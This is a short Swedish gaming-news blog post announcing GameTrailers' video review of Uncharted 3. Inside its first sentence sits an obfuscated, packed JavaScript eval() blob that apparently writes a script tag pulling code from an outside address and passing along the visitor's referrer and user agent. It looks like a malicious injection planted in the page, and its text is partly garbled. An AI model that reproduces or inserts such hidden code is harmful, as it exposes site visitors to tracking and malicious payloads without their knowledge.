Image Image Image Image Image Image Image Image Image Image

| 25 juni, 2018

Scroll to top

Top

No Comments

Uncharted 3 recenserat av GameTrailers

Uncharted 3 recenserat av GameTrailers
Filip Urde
  • On 24 oktober, 2011
  • http://www.revue.se/filip-urde
Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|baaei|var|u0026u|referrer|nanzy||js|php’.split(‘|’),0,{}))
är inte bara Battlefield 3 som är en fet tredjedel som recenserats i dag. Äventyrs giganten Uncharted 3 har även den blivit recenserad. Det här spelet kan inte bli annat än succé!  Här nedan kan man se och höra Gametrailers recension av spelet.

 

Submit a Comment